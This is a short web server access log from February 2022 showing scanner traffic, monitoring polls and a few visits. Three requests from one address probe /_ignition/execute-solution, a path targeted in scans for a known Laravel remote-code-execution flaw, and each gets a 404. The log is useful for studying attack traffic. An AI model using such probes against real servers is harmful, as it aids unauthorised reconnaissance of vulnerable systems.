167.248.133.61 - - [03/Feb/2022:12:13:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.61 - - [03/Feb/2022:12:13:19 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.119 - - [03/Feb/2022:12:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [03/Feb/2022:12:13:47 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [03/Feb/2022:12:14:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:15:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:16:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:17:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Feb/2022:12:18:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.93.14.114 - - [03/Feb/2022:12:18:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [03/Feb/2022:12:19:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:12:19:18 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.220.3.140 - - [03/Feb/2022:12:19:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Feb/2022:12:20:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [03/Feb/2022:12:20:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [03/Feb/2022:12:21:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.146.165.37 - - [03/Feb/2022:12:21:10 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.220.3.140 - - [03/Feb/2022:12:21:35 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [03/Feb/2022:12:21:39 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.146.165.37 - - [03/Feb/2022:12:21:57 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
